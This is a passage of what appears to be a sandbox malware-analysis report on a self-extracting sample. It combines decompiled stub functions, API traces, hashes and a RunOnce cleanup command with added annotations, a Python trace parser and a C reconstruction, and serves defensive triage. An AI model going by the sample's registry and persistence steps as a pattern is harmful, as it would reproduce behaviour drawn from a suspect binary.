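UNKNOWN = "?"                # the sandbox prints "?" for a stack slot it could not resolve


@dataclass
class ApiCall:
    function: str
    module: str
    args: List[Arg]
    ref: int                            # call-site address
    subcall_of: Optional[int] = None    # containing function when reached via a subcall


# Constructed sample: trace lines copied from the API list above (not a new capture).
SAMPLE_TRACE = """\
• memset.MSVCRT ref: 00402CD9
• Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
• Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
• Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
• Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D34
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402DAE
• CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402E0A
• Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
• Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
"""

# Lines without an argument list (memset.MSVCRT ref: ...) have no parentheses and no comma.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

# Assumed mapping of RT_* resource type ordinals (Win32 winuser.h values).
RESOURCE_TYPES = {0x03: "RT_ICON", 0x05: "RT_DIALOG", 0x06: "RT_STRING",
                  0x0A: "RT_RCDATA", 0x0E: "RT_GROUP_ICON"}
# Assumed index of the lpName parameter, from the documented Win32 signatures.
NAME_ARG_INDEX = {"CreateMutexA": 2, "CreateMutexW": 2, "CreateEventA": 3, "CreateEventW": 3}


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == UNKNOWN:
        return UNKNOWN
    # Resolved values are printed as exactly 8 hex digits; anything else is a recovered string.
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised trace line: {line!r}")
        sub, func, mod, argstr, ref = m.groups()
        args = [parse_arg(a) for a in argstr.split(",")] if argstr else []
        calls.append(ApiCall(func, mod, args, int(ref, 16), int(sub, 16) if sub else None))
    return calls


def triage(calls: List[ApiCall]) -> dict:
    """Reduce a trace to resources looked up, string literals seen, named kernel objects
    and a per-module call count. Only the API's real parameters are inspected: the
    sandbox prints a fixed window of stack slots, so slots past the documented arity
    belong to the caller's frame, not to the call."""
    resources, strings, named, modules = [], set(), [], {}
    for c in calls:
        modules[c.module] = modules.get(c.module, 0) + 1
        if c.function.startswith("FindResource") and len(c.args) >= 3:
            name, rtype = c.args[1], c.args[2]       # FindResource(hModule, lpName, lpType)
            entry = (name, RESOURCE_TYPES.get(rtype, rtype))
            if entry not in resources:
                resources.append(entry)
        for a in c.args:
            if isinstance(a, str) and a != UNKNOWN:
                strings.add(a)
        idx = NAME_ARG_INDEX.get(c.function)
        if idx is not None and idx < len(c.args):
            name = c.args[idx]
            named.append((c.function, None if name == 0 else name))   # None = anonymous object
    return {"resources": resources, "strings": strings, "named_objects": named, "modules": modules}


if __name__ == "__main__":
    for key, value in triage(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {value}")
```

On this sample the parser reports a single RT_RCDATA resource named TITLE, the literal "doza2" reaching CloseHandle and MessageBoxA, an anonymous event and a mutex whose name the sandbox did not resolve ("?"); the unresolved mutex name is the one value worth recovering from a memory dump, since a named mutex is usually the INSTANCECHECK single-instance guard and a good host-based indicator.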
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
                                                                                                                                                                                                                                    • API String ID: 1002816675-859929227
                                                                                                                                                                                                                                    • Opcode ID: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
                                                                                                                                                                                                                                    • Instruction ID: e444e2bf9980804398d7675b07319dafb34b849b4f2297f1b5b9eb94544be107
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C470340301ABE764AB25DF4EB7B2698DB85744F10403FBA81F56E1DAFC8C519A5E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 81%
// Editorial annotations (not part of the sandbox output): this is the dialog procedure of the
// self-extractor stub; the resource names TITLE, EXTRACTOPT, VERCHECK and INSTANCECHECK listed
// above are those used by the IExpress/wextract SFX stub. _a4 = hWnd, _a8 = uMsg, _a12 = wParam.
// The decompiler renders the message switch as a chain of subtractions; the cumulative values
// are 0x10 (WM_CLOSE), 0x102 (WM_CHAR), 0x110 (WM_INITDIALOG), 0x111 (WM_COMMAND) and
// 0xfa1 (WM_USER + 0xba1, a private message posted when the worker finishes).
			E004034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {                                  // WM_CLOSE
					__eflags = 1;
					L19:
					_push(0);
					 *0x4091d8 = 1;                             // global abort flag, also set on user cancel below
					L20:
					_push(_a4);
					L21:
					EndDialog();                                // EndDialog(hWnd, 0)
					L22:
					return 1;
				}
				_push(1);                                       // decompiler residue of a push/pop register-load idiom; no effect
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {                                 // WM_CHAR
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {                          // only VK_ESCAPE (0x1b) is handled
						goto L22;
					}
					goto L19;                                   // Escape behaves like WM_CLOSE
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {                                 // WM_INITDIALOG
					_t35 = _a4;
					 *0x408584 = _t35;                          // dialog handle kept for the WM_COMMAND path
					E004043D0(_t35, GetDesktopWindow());        // helper given the desktop window, presumably to position the dialog (inference)
					__eflags =  *0x408184; // 0x1
					if(__eflags != 0) {
						// Control 0x83b is an animation control: 0x464 = ACM_OPENA (AVI resource 0xbb9 from the
						// stub's own module), 0x465 = ACM_PLAY (repeat -1 = loop, frames 0 to 0xffff = all)
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");              // window title is the TITLE resource string
					_t17 = CreateThread(0, 0, E00404FE0, 0, 0, 0x408798);   // extraction worker; thread id written to 0x408798
					 *0x40879c = _t17;                          // worker thread handle
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E004044B9(_t35, 0x4b8, 0, 0, 0x10, 0);  // LoadStringA/MessageBoxA wrapper (see APIs above): string 0x4b8, MB_ICONERROR
						_push(0);
						_push(_t35);
						goto L21;                               // EndDialog(hWnd, 0)
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {                                 // WM_COMMAND
					__eflags = _a12 - 2;
					if(_a12 != 2) {                             // only IDCANCEL (2) is handled
						goto L22;
					}
					ResetEvent( *0x40858c);                     // pause the worker while the user is asked
					_t38 =  *0x408584; // 0x0
					_t25 = E004044B9(_t38, 0x4b2, 0x401140, 0, 0x20, 4);   // string 0x4b2, MB_ICONQUESTION | MB_YESNO
					__eflags = _t25 - 6;
					if(_t25 == 6) {                             // IDYES
						L11:
						 *0x4091d8 = 1;                         // set abort flag
						SetEvent( *0x40858c);                   // resume the worker so it can observe the flag
						_t39 =  *0x40879c; // 0x0
						E00403680(_t39);                        // called with the worker thread handle; body not shown here
						_push(0);
						goto L20;                               // EndDialog(hWnd, 0)
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {                             // IDOK, treated like IDYES
						goto L11;
					}
					SetEvent( *0x40858c);                       // user declined: resume the worker
					goto L22;
				}
				if(_t23 == 0xe90) {                             // 0xfa1: private completion message from the worker
					TerminateThread( *0x40879c, 0);
					EndDialog(_a4, _a12);                       // wParam becomes the dialog's return value
					return 1;
				}
				return 0;                                       // unhandled message
			}


APIs
• TerminateThread.KERNEL32(00000000), ref: 00403535
• EndDialog.USER32(?,?), ref: 00403541
• ResetEvent.KERNEL32 ref: 0040355F
• SetEvent.KERNEL32(00401140,00000000,00000020,00000004), ref: 00403590
• GetDesktopWindow.USER32 ref: 004035C7
• GetDlgItem.USER32(?,0000083B), ref: 004035F1
• SendMessageA.USER32(00000000), ref: 004035F8
• GetDlgItem.USER32(?,0000083B), ref: 00403610
• SendMessageA.USER32(00000000), ref: 00403617
• SetWindowTextA.USER32(?,doza2), ref: 00403623
• CreateThread.KERNEL32 ref: 00403637
• EndDialog.USER32(?,00000000), ref: 00403671
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
• String ID: doza2
• API String ID: 2406144884-612509477
• Opcode ID: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
• Instruction ID: fe1ba82ed1f1710f0b6574d98c0674f12e8c992116b8aaefa4380529af25bc15
• Opcode Fuzzy Hash: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
• Instruction Fuzzy Hash: 6C317271240301BBD7205F25AE4DF2B3E68E789B42F14493AF642B93F5CA7A8911CA5D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
			E00404224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
                                                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E004044B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t76 =  *0x4088c0; // 0x0
                                                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                    					 *0x4087a0 = 0;
                                                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                                                    					_v40 = 0x408598;
                                                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                                                    					_v32 = E00404200;
                                                                                                                                                                                                                                    					_v28 = 0x4088c0;
                                                                                                                                                                                                                                    					 *0x40a288( &_v52);
                                                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                                                    						 *0x40a288(_t32, 0x4088c0);
                                                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if( *0x4088c0 != 0) {
                                                                                                                                                                                                                                    							E00401680(0x4087a0, 0x104, 0x4088c0);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x40a288(_v12);
                                                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                                                    					_t85 =  *0x4087a0; // 0x0
                                                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					GetTempPathA(0x104, 0x4088c0);
                                                                                                                                                                                                                                    					_t61 = 0x4088c0;
                                                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0x4088c1
                                                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0x4088c0; // 0x811181
                                                                                                                                                                                                                                    					_t44 = CharPrevA(0x4088c0, _t5);
                                                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0x4088c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
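As an added illustration, not the sample's code and not Joe Sandbox output: a portable C reconstruction of the default-directory preparation in the GetTempPathA branch above (the trailing backslash is dropped unless it follows a drive colon) together with the non-empty-result check the routine applies to its final path buffer. It assumes a single-byte code page, whereas the sample walks back with CharPrevA, which is DBCS-aware; the names strip_trailing_backslash and default_dir_from_temp are this example's own.

```c
#include <stddef.h>
#include <string.h>

#define PATH_BUF 0x104  /* MAX_PATH, the size the sample passes to GetTempPathA */

/* Equivalent of the decompiled branch:
 *   last = CharPrevA(buf, buf + strlen(buf));
 *   if (*last == '\\' && *CharPrevA(buf, last) != ':') *last = 0;
 * Single-byte characters assumed (an assumption of this example).
 * Returns 1 if a trailing backslash was removed, 0 otherwise. */
int strip_trailing_backslash(char *path)
{
    size_t len = strlen(path);
    if (len == 0)
        return 0;
    char *last = path + len - 1;               /* CharPrevA(path, path + len) */
    if (*last != '\\')
        return 0;
    /* CharPrevA(path, path) returns path itself, so a lone "\" is stripped;
     * "C:\" is kept because the previous character is ':'. */
    if (last > path && last[-1] == ':')
        return 0;
    *last = '\0';
    return 1;
}

/* Fills `out` (PATH_BUF bytes) from a constructed temp path, normalises it
 * the way the sample does, and returns the same success test the routine
 * ends with: non-empty result -> 1, empty -> 0. */
int default_dir_from_temp(const char *temp_path, char out[PATH_BUF])
{
    size_t len = strlen(temp_path);
    if (len >= PATH_BUF)                       /* GetTempPathA would have truncated */
        return 0;
    memcpy(out, temp_path, len + 1);
    strip_trailing_backslash(out);
    return out[0] != '\0';
}
```

Usage: call default_dir_from_temp with the constructed value GetTempPathA would return (for example "C:\\Users\\x\\AppData\\Local\\Temp\\") and compare the result with what the dialog callback at E00404200 receives in lParam.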
(Instruction addresses that the report's code view shows beside each line above were spilled into a separate column by extraction; they lie in the range 0x00404234 to 0x004043c5, with 0x00000000 marking lines that carry no instruction, and the listing is cut off.)
                                                                                                                                                                                                                                    0x0040436e
                                                                                                                                                                                                                                    0x0040436e
                                                                                                                                                                                                                                    0x0040437d
                                                                                                                                                                                                                                    0x00404383
                                                                                                                                                                                                                                    0x00404387
                                                                                                                                                                                                                                    0x0040438e
                                                                                                                                                                                                                                    0x0040438e
                                                                                                                                                                                                                                    0x00404387
                                                                                                                                                                                                                                    0x00404391
                                                                                                                                                                                                                                    0x00404399
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404295
                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                    0x004042a5
                                                                                                                                                                                                                                    0x004042aa
                                                                                                                                                                                                                                    0x004042aa
                                                                                                                                                                                                                                    0x004042ad
                                                                                                                                                                                                                                    0x004042ad
                                                                                                                                                                                                                                    0x004042af
                                                                                                                                                                                                                                    0x004042b0
                                                                                                                                                                                                                                    0x004042b6
                                                                                                                                                                                                                                    0x004042c2
                                                                                                                                                                                                                                    0x004042c8
                                                                                                                                                                                                                                    0x004042ce
                                                                                                                                                                                                                                    0x004042e4
                                                                                                                                                                                                                                    0x004042e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004042ce

APIs
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00404236
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0040424C
• GetProcAddress.KERNEL32(00000000,000000C3), ref: 00404263
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0040427A
• GetTempPathA.KERNEL32(00000104,004088C0,?,00000001), ref: 0040429F
• CharPrevA.USER32(004088C0,00811181,?,00000001), ref: 004042C2
• CharPrevA.USER32(004088C0,00000000,?,00000001), ref: 004042D6
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00404391
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 004043A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
• Instruction ID: 0b25c262f151fa20e67494b359207c62db184f6ba7d2e960933b952b011f601d
• Opcode Fuzzy Hash: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
• Instruction Fuzzy Hash: 6841D2B4A00304AFE711AF60DE84A6E7BA4EB85344F54417EEA81B73D1CB7C8D05876D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00402773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                                                    				_t23 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                                                    							E00401781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                                                    							E0040658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0040658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x401140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00401680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00406CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

APIs
• CharUpperA.USER32(8F135E3B,00000000,00000000,00000000), ref: 004027A8
• CharNextA.USER32(0000054D), ref: 004027B5
• CharNextA.USER32(00000000), ref: 004027BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
• RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 004028AA
• GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 004028B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 004027E4
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
• Instruction ID: b29046f07952b478a6343dcd1b107d04b4820205fbcf11bc0dc1fa30adae9d17
• Opcode Fuzzy Hash: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
• Instruction Fuzzy Hash: FA41F87590012C6FDB249F549D49AEA77BCEF15300F0080BAF945F2190CBB44E968FA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
			E00402267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t19 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                    				if( *0x408530 != 0) {
                                                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                                                    						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                    								E0040658A( &_v268, 0x104, 0x401140);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                    							E0040171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00406CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 004022A3
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 004022D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004022F5
